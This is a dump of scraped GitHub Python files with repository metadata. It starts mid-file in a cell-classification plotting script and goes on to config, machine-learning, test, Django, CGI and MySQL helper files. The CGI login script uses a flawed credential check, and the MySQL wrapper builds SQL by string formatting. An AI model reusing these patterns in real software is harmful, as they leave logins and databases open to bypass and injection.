json_file = open(NN_PATH + 'regression_NN.json', 'r')\r\n regression_model = model_from_json(json_file.read())\r\n json_file.close()\r\n regression_model.load_weights(NN_PATH + 'regression_NN.h5')\r\n\r\n labels = file_to_list(NN_PATH + 'class_labels.txt')\r\n all_SDE_collections = []\r\n\r\n SDE_densities_df = pd.DataFrame()\r\n SDE_histograms_df = pd.DataFrame()\r\n classes_histograms_df = pd.DataFrame()\r\n\r\n # sort according to windows\r\n data_collection_keys = sort_alphanumerically(data_collection.keys())\r\n\r\n SDE_cell_count_collection = []\r\n for subject in data_collection_keys:\r\n print('\\n\\nPredicting cells of ' + subject, end='', flush=True)\r\n histogram = {key: 0 for key in labels}\r\n SDE_data_collection = []\r\n unknown = 0\r\n for idx in range(len(data_collection[subject])):\r\n print('.', end='', flush=True)\r\n data = np.asarray([data_collection[subject][idx]])\r\n prediction = classification_model.predict(data)\r\n processed_cell_count += 1\r\n if np.max(prediction) < CONFUSION_THRESHOLD:\r\n unknown += 1\r\n continue\r\n\r\n result = [np.argmax(y) for y in prediction][0]\r\n histogram[labels[result]] += 1\r\n\r\n if labels[result] == 'SDE shapes':\r\n SDE_data_collection.append(data)\r\n\r\n # normalize classes histogram\r\n histogram['unknown'] = unknown\r\n classes_hist_values_norm = list(histogram.values()) / np.sum(list(histogram.values()))\r\n\r\n # SDE distribution\r\n SDE_results = []\r\n for idx in range(len(SDE_data_collection)):\r\n print('.', end='', flush=True)\r\n SDE_prediction = regression_model.predict(SDE_data_collection[idx])\r\n SDE_results.append(SDE_prediction)\r\n\r\n subject = subject.replace('_', ' ')\r\n\r\n print('\\n\\nAnalyzing cells of ' + subject, flush=True)\r\n # probability density estimation\r\n x_grid = np.linspace(-1.25, 1.25, 1251)[:, np.newaxis]\r\n kde = KernelDensity(bandwidth=0.025, kernel='gaussian')\r\n SDE_results = np.asarray(np.squeeze(SDE_results)).reshape(-1, 1)\r\n kde.fit(SDE_results)\r\n log_prob = kde.score_samples(x_grid)\r\n kde_dist = np.exp(log_prob)\r\n\r\n all_SDE_collections.append(np.exp(log_prob))\r\n ppath = subject.replace('\\\\', '_')\r\n dest_path_SDE_raw = data_directory + 'SDE_raw_' + ppath + '.csv'\r\n np.savetxt(dest_path_SDE_raw, SDE_results)\r\n\r\n # identifier = folder prefix (C1, C2, ...)\r\n identifier = subject.split(' ')[0]\r\n SDE_densities_df[identifier] = kde_dist\r\n SDE_hist, bins = np.histogram(SDE_results, bins=np.linspace(-1.25, 1.25, 126), density=True)\r\n SDE_hist = np.append(SDE_hist, [0])\r\n SDE_histograms_df[identifier] = SDE_hist\r\n classes_histograms_df[identifier] = classes_hist_values_norm\r\n\r\n SDE_cell_count_collection.append(len(SDE_results))\r\n \r\n print('\\nExporting CSV files for \"' + directory + '\"')\r\n # append independent variables to dataframes\r\n SDE_densities_df['x'] = x_grid\r\n SDE_histograms_df['bins'] = bins\r\n classes_histograms_df['bins'] = histogram.keys()\r\n\r\n # save_dataframes to csv files\r\n dest_path_SDE_densities = data_directory + 'SDE_densities.csv'\r\n dest_path_SDE_histograms = data_directory + 'SDE_histograms.csv'\r\n dest_path_classes_histograms = data_directory + 'classes_histograms.csv'\r\n\r\n SDE_densities_df.to_csv(dest_path_SDE_densities, index=False)\r\n SDE_histograms_df.to_csv(dest_path_SDE_histograms, index=False)\r\n classes_histograms_df.to_csv(dest_path_classes_histograms, index=False)\r\n\r\n print('Generating line plot for \"' + directory + '\"')\r\n subject_names = SDE_densities_df.head(0).columns\r\n # 
minimum of \"1\" for reasonable visualisation of the plot height when using a single input folder\r\n subject_count = len(subject_names) - 1\r\n height_count = max(subject_count, 2)\r\n\r\n height = mm2inch(22 * height_count + 5)\r\n fig, axes = plt.subplots(1, 2, figsize=(mm2inch(180), height))\r\n\r\n subscale = 7\r\n y_offset = subscale * (subject_count-1)\r\n ax1 = plt.subplot(1, 2, 2)\r\n\r\n x_grid = np.linspace(-1.25, 1.25, 1251, dtype=np.single)\r\n\r\n for idx in range(subject_count):\r\n bardata = classes_histograms_df[subject_names[idx]]\r\n plt.plot(x_grid, SDE_densities_df[subject_names[idx]] + y_offset, color=plot_color, linewidth=0.5)\r\n plt.fill_between(x_grid, y_offset, SDE_densities_df[subject_names[idx]] + y_offset, alpha=0.2,\r\n color=plot_color)\r\n subject_id = subject_names[idx]\r\n subject_id = subject_id.split(' ')[0]\r\n\r\n SDE_cell_count = SDE_cell_count_collection[idx]\r\n\r\n plt.text(0.65, y_offset + 0.65*subscale, 'total: %d' % SDE_cell_count, **FONT_SMALL)\r\n\r\n # calculate expect value\r\n density = SDE_densities_df[subject_names[idx]]\r\n res = x_grid[1]-x_grid[0]\r\n expect_val = np.trapz(np.multiply(density, x_grid), dx=res)\r\n std_dev = np.sqrt(np.trapz(np.multiply(np.power(np.subtract(x_grid, expect_val), 2), density), dx=res))\r\n\r\n for jdx in range(len(density)):\r\n probability = np.trapz(density[0:jdx], x_grid[0:jdx])\r\n if probability >= 0.025:\r\n prob_0025_x_val = x_grid[jdx]\r\n jdx_save = jdx\r\n break\r\n\r\n for jdx in range(len(density)):\r\n probability = np.trapz(density[jdx_save:jdx+jdx_save], x_grid[jdx_save:jdx+jdx_save])\r\n if probability >= 0.95:\r\n prob_0975_x_val = x_grid[jdx+jdx_save]\r\n break\r\n\r\n lb = np.where(x_grid == find_nearest(x_grid, prob_0025_x_val))[0][0]\r\n ub = np.where(x_grid == find_nearest(x_grid, prob_0975_x_val))[0][0]\r\n inner_integral = np.trapz(density[lb:ub], x_grid[lb:ub], dx=res)\r\n ax1.plot([expect_val, expect_val], [y_offset, y_offset + 0.9 * subscale], '--', linewidth=0.5,\r\n color=plot_color)\r\n ax1.add_patch(patches.Rectangle((x_grid[lb], y_offset), (x_grid[ub]-x_grid[lb]), 0.9 * subscale,\r\n facecolor='black', fill=True, alpha=0.1, linewidth=0.0))\r\n plt.text(-1.2, y_offset + 0.65 * subscale, '$\\mu$ = %.2f' % expect_val, **FONT_SMALL)\r\n plt.text(-1.2, y_offset + 0.45 * subscale, 'CI$_{0.95}$ = [%.2f,%.2f]' % (x_grid[lb], x_grid[ub]),\r\n **FONT_SMALL)\r\n\r\n mutation_label_filepath = data_directory + 'mutation_labels.txt'\r\n if os.path.exists(mutation_label_filepath):\r\n mutation_labels = []\r\n mutation_label_file = open(mutation_label_filepath)\r\n items = mutation_label_file.readlines()\r\n for item in items:\r\n mutation_labels.append(item.split('\\t')[1].strip())\r\n plt.text(-1.2, y_offset + 0.25 * subscale, mutation_labels[idx], **FONT_SMALL_ITALIC)\r\n y_offset = y_offset - subscale\r\n\r\n plt.xlim(np.min(x_grid), np.max(x_grid))\r\n plt.ylim(-subscale*0.1, subscale * subject_count + subscale / 4)\r\n plt.yticks(np.linspace(0, subscale*(subject_count-1), subject_count), [])\r\n SDE_label_list = []\r\n SDE_labels = [-1.00, -0.67, -0.33, 0.00, 0.33, 0.67, 1.00]\r\n SDE_labels_custom = ['SP', 'ST II', 'ST I', 'D', 'E I', 'E II', 'E III']\r\n for idx in range(len(SDE_labels_custom)):\r\n SDE_label_list.append('%.2f\\n' % (SDE_labels[idx]) + SDE_labels_custom[idx])\r\n plt.xticks(SDE_labels, **FONT_SMALL)\r\n ax = plt.gca()\r\n ax.set_xticklabels(SDE_label_list, **FONT_SMALL)\r\n\r\n plt.yticks(np.linspace(0, subscale*(subject_count-1), subject_count), [])\r\n 
plt.ylabel('probability density', **FONT)\r\n plt.xlabel('SDE distribution', **FONT)\r\n ax1.xaxis.set_label_position('top')\r\n plt.grid(True)\r\n\r\n ax2 = plt.subplot(1, 2, 1)\r\n y_offset = subscale * (subject_count-1)\r\n\r\n print('Generating bar plot for \"' + directory + '\"')\r\n for idx in range(subject_count):\r\n bardata = classes_histograms_df[subject_names[idx]]\r\n for jdx in range(len(bardata)):\r\n if jdx == 0:\r\n color = plot_color\r\n else:\r\n color = 'black'\r\n ax2.add_patch(patches.Rectangle((jdx+0.75, y_offset), 0.5, bardata[jdx] * subscale * 0.9,\r\n edgecolor=color, facecolor='white', linewidth=0.5))\r\n ax2.add_patch(patches.Rectangle((jdx+0.75, y_offset), 0.5, bardata[jdx] * subscale * 0.9,\r\n edgecolor=color, facecolor=color, fill=True, alpha=0.2, linewidth=0.5))\r\n plt.text(jdx + 0.75 + 0.14, y_offset + 1, '%.3f' % bardata[jdx], **FONT_SMALL, rotation=90)\r\n subject_id = subject_names[idx]\r\n subject_id = subject_id.split(' ')[0]\r\n total_cell_count = str(len(data_collection[data_collection_keys[idx]]))\r\n plt.text(0.1 + 6, y_offset + 0.65 * subscale, 'total: ' + total_cell_count, **FONT_SMALL)\r\n plt.text(0.1, y_offset + 0.5, subject_id, **FONT_SMALL)\r\n y_offset = y_offset - subscale\r\n\r\n plt.xlim(0, len(bardata) + 1)\r\n if ALT_LABELS:\r\n plt.xticks([1, 2, 3, 4, 5, 6, 7], ALT_LABEL_VALUES, **FONT_SMALL)\r\n else:\r\n plt.xticks([1, 2, 3, 4, 5, 6, 7], histogram.keys(), rotation=90, **FONT_SMALL)\r\n plt.ylim(-subscale*0.1, subscale * subject_count + subscale / 4)\r\n plt.yticks(np.linspace(0, subscale * (subject_count-1), subject_count), [])\r\n plt.yticks(np.linspace(0, subscale * (subject_count-1), subject_count), [])\r\n plt.ylabel('probability', **FONT)\r\n ax2.xaxis.set_label_position('top')\r\n plt.xlabel('classification', **FONT)\r\n\r\n plt.tight_layout()\r\n plt.savefig(data_directory + '\\\\evaluation_results.pdf')\r\n plot_color_idx += 1\r\n\r\nprint('\\nProcessed ' + str(processed_cell_count) + ' cells')\r\nplt.show()\r\n","repo_name":"Dynamicist-handa/ML_CytoMorph","sub_path":"src/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":14686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"69967212424","text":"from dynaconf import Dynaconf\n\nsettings = Dynaconf(\n envvar_prefix=\"AGING_REPORT\",\n settings_files=[\"settings.toml\", \".secrets.toml\"],\n environments=True,\n)\n\n# `envvar_prefix` = export envvars with `export DYNACONF_FOO=bar`.\n# `settings_files` = Load this files in the order.\n","repo_name":"department-of-general-services/priority-vendor-aging-report","sub_path":"app/src/dgs_fiscal/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"34019829533","text":"import os\nimport pandas as pd\nimport numpy as np\nimport prepare_data\nfrom skimage import transform\nfrom numba import jit\nfrom multiprocessing import Pool\n\n\nif __name__ == '__main__':\n pd.options.display.width = 200\n pd.options.display.max_columns = 20\n\n test_mode = True\n kernel_mode = False\n if kernel_mode:\n base_dir = os.path.join('/kaggle', 'input', 'understanding_cloud_organization')\n output_dir_base = os.path.join('/kaggle', 'working')\n else:\n base_dir = 'data'\n output_dir_base = 'data'\n\n num_calibration_samples = 500\n num_testing_samples = 100\n num_training_samples = len(os.listdir(os.path.join(base_dir, 
'train_images'))) - num_calibration_samples - num_testing_samples\n\n def get_im_arr(folder, folder_list, save_name):\n args = [(folder, f) for f in folder_list]\n with Pool() as p:\n res = p.starmap_async(prepare_data.process_one_image, args)\n im_arr = res.get()\n data = np.concatenate([x[0][np.newaxis, :, :, np.newaxis] for x in im_arr], axis=0)\n np.save(os.path.join(output_dir_base, save_name), data)\n names = [x[1] for x in im_arr]\n pd.DataFrame({'names': names}).to_csv(os.path.join(output_dir_base, '{}.csv'.format(save_name)), index=False,\n header=True)\n\n\n train_folder = os.path.join(base_dir, 'train_images')\n train_folder_list = os.listdir(train_folder)[:num_training_samples]\n get_im_arr(train_folder, train_folder_list, 'train_data')\n calib_folder_list = os.listdir(train_folder)[-(num_calibration_samples + num_testing_samples):-num_testing_samples]\n get_im_arr(train_folder, calib_folder_list, 'calib_data')\n test_folder_list = os.listdir(train_folder)[-num_testing_samples:]\n get_im_arr(train_folder, test_folder_list, 'test_data')\n submit_folder = os.path.join(base_dir, 'test_images')\n submit_folder_list = os.listdir(submit_folder)\n get_im_arr(submit_folder, submit_folder_list, 'submit_data')\n\n\n @jit\n def add_label(pixel_arr, label_arr_shape, label):\n label_arr = np.zeros(label_arr_shape)\n height, width = label_arr.shape\n for j in range(len(pixel_arr) // 2):\n start, length = pixel_arr[2 * j] - 1, pixel_arr[2 * j + 1]\n for k in range(length):\n p = start + k\n row = p % height\n col = p // height\n label_arr[row, col] = label\n return label_arr\n\n\n def get_masks(file_list, labels):\n mask = np.zeros((len(file_list), 350, 525, 4), np.int8)\n for i, f in enumerate(file_list):\n for j, cat in enumerate(['Fish', 'Flower', 'Gravel', 'Sugar']):\n pixels = labels.loc[labels['Image_Label'] == f + '_' + cat, 'EncodedPixels'].values[0]\n if type(pixels) != str:\n mask[i, :, :, j] = np.zeros((350, 525), np.int8)\n else:\n pixel_arr = np.array([int(p) for p in pixels.split(' ')])\n class_mask = add_label(pixel_arr, (1400, 2100), 1)\n class_mask = transform.downscale_local_mean(class_mask, (4, 4))\n mask[i, :, :, j] = (class_mask > 0.5).astype(np.int8)\n return mask\n\n labels = pd.read_csv(os.path.join(base_dir, 'train.csv'))\n train_names = pd.read_csv(os.path.join(base_dir, 'train_data.csv'))['names'].values\n mask = get_masks(train_names, labels)\n np.save(os.path.join(output_dir_base, 'train_masks'), mask)\n calib_names = pd.read_csv(os.path.join(base_dir, 'calib_data.csv'))['names'].values\n mask = get_masks(calib_names, labels)\n np.save(os.path.join(output_dir_base, 'calib_masks'), mask)\n test_names = pd.read_csv(os.path.join(base_dir, 'test_data.csv'))['names'].values\n mask = get_masks(test_names, labels)\n np.save(os.path.join(base_dir, 'test_masks'), mask)\n","repo_name":"btrotta/kaggle-clouds","sub_path":"get_image_arrays.py","file_name":"get_image_arrays.py","file_ext":"py","file_size_in_byte":3909,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"40363328436","text":"from keras import backend as K\n\ndef feature_content_loss(content, output):\n \"\"\"\n Featue Representation loss function\n Encourages the output image to matche the feature responses of the original\n image\n content and output are feature representations of content image and output\n image respectively\n \"\"\"\n return K.sum(K.square(output - content))\n\n\ndef gram_matrix(x):\n \"\"\"\n The feature correlations are given by 
the\n Gram matrix, where G(l)ij is the inner product\n between the vectorised feature map i and j in layer l\n \"\"\"\n if K.image_dim_ordering() == 'th':\n features = K.batch_flatten(x)\n else:\n features = K.batch_flatten(K.permute_dimensions(x, (2, 0, 1)))\n\n return K.dot(features, K.transpose(features))\n\n\ndef style_reconstruction_loss(style, output, image_rows, image_cols):\n \"\"\"\n Style Reconstruction loss.Encourages to find another image that matches the style\n representation of the original image. This is done by minimising the mean-squared distance\n between the entries of the Gram matrix from the original image and the Gram matrix of the\n image to be generated.\n \"\"\"\n h, w, c = image_rows, image_cols, 3\n fac = (1.0) / float((2 * h * w * c) ** 2)\n loss = fac * K.sum(K.square(gram_matrix(output) - gram_matrix(style)))\n return loss\n\n\ndef variation_loss(x, img_nrows, img_ncols):\n \"\"\"\n Total variational loss. Encourages spatial smoothness\n in the output image.\n \"\"\"\n H, W = img_nrows, img_ncols\n if K.image_dim_ordering() == 'th':\n a = K.square(x[:, :, :H - 1, :W - 1] - x[:, :, 1:, :W - 1])\n b = K.square(x[:, :, :H - 1, :W - 1] - x[:, :, :H - 1, 1:])\n else:\n a = K.square(x[:, :H - 1, :W - 1, :] - x[:, 1:, :W - 1, :])\n b = K.square(x[:, :H - 1, :W - 1, :] - x[:, :H - 1, 1:, :])\n\n return K.sum(K.pow(a + b, 1.25))\n","repo_name":"makaveli10/NeuralStyleTransfer","sub_path":"NeuralStyleTransfer/Neural_Style/compute_loss.py","file_name":"compute_loss.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4643305241","text":"from transformers import AutoConfig, AutoModel\nfrom huggingface_hub import HfApi, ModelFilter\n\ndef get_model_information(model):\n\n print(\"Collecting information for model: {0}\".format(model.modelId))\n\n # Get the model configuration\n config = AutoConfig.from_pretrained(model.modelId)\n\n # Get the model architecture\n model_arch = AutoModel.from_pretrained(model.modelId)\n \n # Get the model size in bytes\n model_size_bytes = sum(p.numel() for p in model_arch.parameters() if p.requires_grad) * 4 # Assuming float32\n \n # Convert the model size to megabytes (MB)\n model_size_mb = model_size_bytes / (1024 ** 2)\n \n # Get the total number of model parameters\n num_params = sum(p.numel() for p in model_arch.parameters())\n\n info_dict={'date': model.lastModified, 'model size (MB)': model_size_mb, 'num params': num_params, 'model id': model.modelId}\n\n return info_dict\n \n\n\n\ndef retrieve_all_huggingface_models(filtering_language):\n \n api = HfApi()\n model_list = api.list_models(\n filter=ModelFilter(\n language=filtering_language\n )\n )\n model_list = list(model_list)\n \n return model_list\n\n\ndef group_models_by_year(model_list):\n year_dict = {}\n\n for model in model_list:\n year = int(model.lastModified.split('-')[0])\n if year not in year_dict.keys():\n year_dict[year] = []\n year_dict[year].append(model)\n \n\n for year in range(2025, 2014, -1):\n \n if year in year_dict:\n year_dict[year] = sorted(year_dict[year], key=lambda x: x.lastModified, reverse=True)\n\n print(\"### {} {}\\n\".format(year,len(year_dict[year])))\n \n print(\"| | | |\")\n print(\"|:--------:|:--------:|:--------:|\")\n cnt = 0\n for model in year_dict[year]:\n if cnt%3 ==0:\n print(\"|\",end='')\n print(\" {} |\".format(model.modelId), end='')\n if cnt%3 ==2:\n print(\"\")\n cnt += 1\n\n print(\"\\n\\n\")\n\n for year in range(2025, 2014, 
-1):\n\n if year in year_dict:\n\n print(\"year : {} count: {}\".format(year, len(year_dict[year])))\n \n\n\nfiltering_language = \"code\"\nmodel_list = retrieve_all_huggingface_models(filtering_language)\ngroup_models_by_year(model_list)\n","repo_name":"gai4se/LLM4SE","sub_path":"scripts/code_model_info.py","file_name":"code_model_info.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"81"} +{"seq_id":"18245204253","text":"n=int(input())\ntemp=n\na=0\nwhile temp:\n a+=1\n temp//=10\nb=n\nsum=0\nwhile n:\n sum+=(n%10)**a\n n//=10\n a-=1\nif sum==b:\n print(True)\nelse:\n print(False)","repo_name":"21MH1A05B6/codemind-python","sub_path":"Disarium_number.py","file_name":"Disarium_number.py","file_ext":"py","file_size_in_byte":168,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"26686402815","text":"from playwright.sync_api import Request\n\n\ndef test_event_expect_request(login, page):\n def track_request_once(request: Request):\n print(\"Request sent: \" + request.url)\n\n page.goto(\"/\")\n page.once(\"request\", track_request_once)\n page.get_by_role(\"button\", name=\"refresh stats\").click() # page.once() tracks request\n page.reload()\n page.get_by_role(\"button\", name=\"refresh stats\").click() # however second time won't work\n page.goto(\"/tests\")\n","repo_name":"half-tested/playwright-python","sub_path":"tests/11_events/test_03_adding_one_off_event_listener.py","file_name":"test_03_adding_one_off_event_listener.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"36628521590","text":"cities = {'Seoul': {'country': 'Korea',\n 'population': '9988000',\n 'fact': 'Seoul is highly urbanized and has little green space'},\n\n 'Manila': {'country': 'Philippines',\n 'population': '1780000',\n 'fact': 'It is the capital of the Philippines.'},\n\n 'New York': {'country': 'USA',\n 'population': '8468000',\n 'fact': 'It is the most linguistically diverse city in the world.'}\n}\n\nfor city, info_dict in cities.items():\n print(city)\n for category, info in info_dict.items():\n print(category + \": \" + info)\n print(\"\\n\")\n ","repo_name":"SenpaiEggpie-acad/Deep-Learning-BWF-Nils-Santos","sub_path":"Task6/Chap6-Exercise11.py","file_name":"Chap6-Exercise11.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74726462344","text":"from django.urls import path\nfrom . 
import views\n\napp_name = 'interview_organizer'\n\nurlpatterns = [\n #Home page\n path('', views.index, name='index'),\n #Upcoming interviews\n path('upcoming/', views.upcoming, name='upcoming'),\n #Interview archive\n path('archive/', views.archive, name='archive'),\n #Page for single interview\n path('interviews//', views.interview, name='interview'),\n # Page for questions of an interview\n path('interviews//questions/', views.questions, name='questions'),\n path('new_interview/', views.new_interview, name='new_interview'),\n path('interviews//edit/', views.edit_interview, name='edit_interview'),\n path('delete_interview//', views.delete_interview, name='delete_interview'),\n]","repo_name":"PikkuJanne/interview_organizer_git","sub_path":"interview_organizer/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"23727763281","text":"# -*- coding: utf-8 -*-\n\"\"\"Installer for the imio.project package.\"\"\"\n\nfrom setuptools import find_packages\nfrom setuptools import setup\n\n\nlong_description = (\n open('README.rst').read()\n + '\\n' +\n 'Contributors\\n'\n '============\\n'\n + '\\n' +\n open('CONTRIBUTORS.rst').read()\n + '\\n' +\n open('CHANGES.rst').read()\n + '\\n')\n\n\nsetup(\n name='imio.project.core',\n version='1.3.2.dev0',\n description=\"Project management\",\n long_description=long_description,\n # Get more from http://pypi.python.org/pypi?%3Aaction=list_classifiers\n classifiers=[\n \"License :: OSI Approved :: GNU General Public License (GPL)\",\n \"Environment :: Web Environment\",\n \"Framework :: Plone\",\n \"Framework :: Plone :: 4.3\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 2.7\",\n ],\n keywords='',\n author='IMIO',\n author_email='dev@imio.be',\n url='http://pypi.python.org/pypi/imio.project.core',\n license='GPL',\n packages=find_packages('src', exclude=['ez_setup']),\n namespace_packages=['imio', 'imio.project'],\n package_dir={'': 'src'},\n include_package_data=True,\n zip_safe=False,\n install_requires=[\n 'Plone',\n 'collective.contact.core',\n 'collective.contact.plonegroup',\n 'collective.dexteritytextindexer',\n 'collective.z3cform.chosen',\n 'collective.z3cform.datagridfield',\n 'dexterity.localrolesfield',\n 'plone.app.dexterity',\n 'plone.app.lockingbehavior',\n 'plone.app.versioningbehavior',\n 'plone.principalsource',\n 'plone.formwidget.datetime',\n 'setuptools',\n 'Products.PluggableAuthService>=1.11.3',\n ],\n extras_require={\n 'test': [\n 'plone.app.testing',\n ],\n },\n entry_points=\"\"\"\n [z3c.autoinclude.plugin]\n target = plone\n \"\"\",\n)\n","repo_name":"IMIO/imio.project.core","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"2032098210","text":"# coding=utf-8\n\"\"\"\n Created by Abadie Moran at 28/06/2019\n\n\"\"\"\nfrom source.parser.inside import inside_parse\n\n\ndef replace_pattern(html_code, folder, pattern):\n \"\"\"\n Remove external dependencies of the img/css/js code\n :param pattern: the pattern code for the css or the js\n :type pattern: CodePattern\n :param html_code: the html code to change\n :type html_code: str\n :param folder: the folder of the html file\n :type folder: str\n :return: the updated code\n :rtype: str\n\n Examples :\n\n # css\n pattern = CodePattern(CodePattern.CSS)\n code = ''\n 
replace_pattern(code, \"/home/path\"/, pattern)\n >> \n\n # js\n pattern = CodePattern(CodePattern.SCRIPT)\n code = ''\n replace_pattern(code, \"/home/path/\", pattern)\n >> \n\n # img\n pattern = CodePattern(CodePattern.IMG)\n code = ''\n replace_pattern(code, \"/home/path/\", patter,)\n >> \n\n \"\"\"\n # 1. Split \r\n \r\n \r\n \r\n Title\r\n \r\n \r\n
\r\n \r\n \r\n \r\n \"\"\")\r\n if useremail and userpwd in data:\r\n print(\"\"\"\r\n Update Password\r\n {} \r\n \r\n \r\n \r\n \r\n \"\"\".format(data))\r\n\r\n for data in products:\r\n print(\"\"\"\r\n \r\n \r\n \r\n \r\n \r\n \"\"\".format(data['name'], data['price'], data['img']))\r\n\r\n print(\"\"\"\r\n Product NameProduct PriceProduct Image Name : {} Price : {} \"image\" \r\n \"\"\")\r\n\r\n else:\r\n print(\"\"\"\r\n Login Failed
\r\n \"\"\")\r\n\r\n print(\"\"\"\r\n \r\n \r\n \"\"\")\r\n\r\ndef checkLogin():\r\n data = list()\r\n query = \"SELECT * FROM users WHERE userEmail = %s AND userPwd = %s\"\r\n cursor.execute(query, (useremail,userpwd))\r\n for data in cursor:\r\n pass\r\n login(data)\r\n\r\ncheckLogin()","repo_name":"brainmentorspvtltd/PythonTPDDL","sub_path":"Day-16/cgi-bin/login_2.py","file_name":"login_2.py","file_ext":"py","file_size_in_byte":2049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"41861238734","text":"import os\nimport subprocess\nfrom pathlib import Path\n\nPROJECT_ROOT = project_root = Path(__file__).parents[4]\n\n\ndef run_cmd(args: list[str], **kwargs) -> subprocess.CompletedProcess:\n \"\"\"\n Run the given command and return the completed process.\n\n All commands are executed from the working directory of the project root.\n\n All keyword arguments are forwarded to ``subprocess.run``. If the ``env``\n keyword argument is provided, it will be merged into the system environment\n variables before forwarding.\n\n :param args: the argument vector to execute\n :param kwargs: keyword arguments to forward to ``subprocess.run``\n :return: the completed process, irrespective of success or failure\n \"\"\"\n\n proc = subprocess.run(\n args,\n cwd=PROJECT_ROOT,\n capture_output=True,\n text=True,\n encoding=\"utf-8\",\n env=os.environ.copy() | kwargs.pop(\"env\", {}),\n **kwargs,\n )\n if proc.returncode != 0:\n print(proc.stdout)\n print(proc.stderr)\n return proc\n","repo_name":"dhruvkb/pls","sub_path":"examples/src/examples/utils/sub.py","file_name":"sub.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":587,"dataset":"github-code","pt":"78"} +{"seq_id":"18933801078","text":"\"\"\"\nGiven an integer array nums sorted in non-decreasing order and an integer target, return true if target is a majority element, or false otherwise.\n\nA majority element in an array nums is an element that appears more than nums.length / 2 times in the array.\n\n\n\nExample 1:\n\nInput: nums = [2,4,5,5,5,5,5,6,6], target = 5\nOutput: true\nExplanation: The value 5 appears 5 times and the length of the array is 9.\nThus, 5 is a majority element because 5 > 9/2 is true.\n\nExample 2:\n\nInput: nums = [10,100,101,101], target = 101\nOutput: false\nExplanation: The value 101 appears 2 times and the length of the array is 4.\nThus, 101 is not a majority element because 2 > 4/2 is false.\n\n\nConstraints:\n\n1 <= nums.length <= 1000\n1 <= nums[i], target <= 10^9\nnums is sorted in non-decreasing order.\n\"\"\"\n\n\nclass Solution:\n def isMajorityElement(self, nums: List[int], target: int) -> bool:\n hmap = {}\n for num in nums:\n if num not in hmap:\n hmap[num] = 1\n else:\n hmap[num] += 1\n if target in hmap:\n return hmap[target] > len(nums)//2\n return False","repo_name":"prateetishah/Leetcode-Solutions","sub_path":"1150. Check If a Number Is Majority Element in a Sorted Array/1150. Check If a Number Is Majority Element in a Sorted Array.py","file_name":"1150. 
Check If a Number Is Majority Element in a Sorted Array.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8827656690","text":"import pymysql\nimport db\nfrom env import *\n\nclass MySqlDB(db.DB):\n\tdef __init__(self, is_master=False):\n\t\tself.is_master = is_master\n\n\tdef connect(self):\n\t\tinf = conf[\"mysql\"]\n\n\t\tcondb = inf[\"db\"]\n\t\tif self.is_master == False:\n\t\t\tif conf[\"is_test\"]:\n\t\t\t\tcondb = inf[\"test_db\"]\n\n\t\tconn = pymysql.connect(\n\t\t\t\thost = inf[\"host\"],\n\t\t\t\tdb = condb,\n\t\t\t\tuser = inf[\"user\"],\n\t\t\t\tpasswd = inf[\"password\"],\n\t\t\t\tcharset = \"utf8\",\n\t\t\t\tlocal_infile = 1\n\t\t)\n\t\tconn.autocommit(True)\n\t\treturn conn\n\n\tdef execSql(self, sql):\n\t\tcur = None\n\t\ttry:\n\t\t\tcur = self.connect().cursor()\n\t\t\tcur.execute(sql)\n\t\t\treturn cur\n\t\texcept:\n\t\t\tif cur: cur.close()\n\t\t\tprint(sql)\n\t\t\traise\n\n\tdef truncateTable(self, tablename):\n\t\tsql = \"truncate table %s;\" % tablename\n\t\treturn self.execSql(sql)\n\t\t\n\tdef countTable(self, tablename, whereList=[]):\n\t\tif self.tableExists(tablename) == False:\n\t\t\treturn 0\n\t\tstrwhere = \"\"\n\t\tif len(whereList) > 0:\n\t\t\tstrwhere = \"where %s\" % (\" and \".join(whereList))\n\t\tsql = \"select count(*) as cnt from %s %s\" % (tablename, strwhere)\n\t\tcur = self.execSql(sql)\n\t\trow = cur.fetchone()\n\t\tcur.close()\n\t\treturn row[0]\n\n\tdef close(self):\n\t\tif self.conn != None:\n\t\t\tself.conn.close()\n\n\tdef _createTableFromTemplate(self, sqlFile, tableName, replaces={}):\n\t\ttry: \n\t\t\tf = open(sqlFile, \"r\")\n\t\t\tsql = f.read()\n\t\t\tsql = sql.replace(\"#TABLENAME#\", tableName)\n\t\t\tfor k in replaces.keys():\n\t\t\t\tsql = sql.replace(k, replaces[k])\n\t\t\tf.close()\n\t\t\tcur = self.execSql(sql)\n\t\t\tcur.close()\n\t\texcept:\n\t\t\traise\n\n\tdef createTable(self, tableName, templateName=\"\", replaces={}):\n\t\tif templateName != \"\":\n\t\t\tself._createTableFromTemplate(\"%s/create_table_%s.sql\" % (SQL_DIR, \n templateName), tableName, replaces)\n\t\telse:\n\t\t\tself._createTableFromTemplate(\"%s/create_table_%s.sql\" % (SQL_DIR, \n tableName), tableName)\n\t\n\tdef tableExists(self, tableName):\n\t\tif 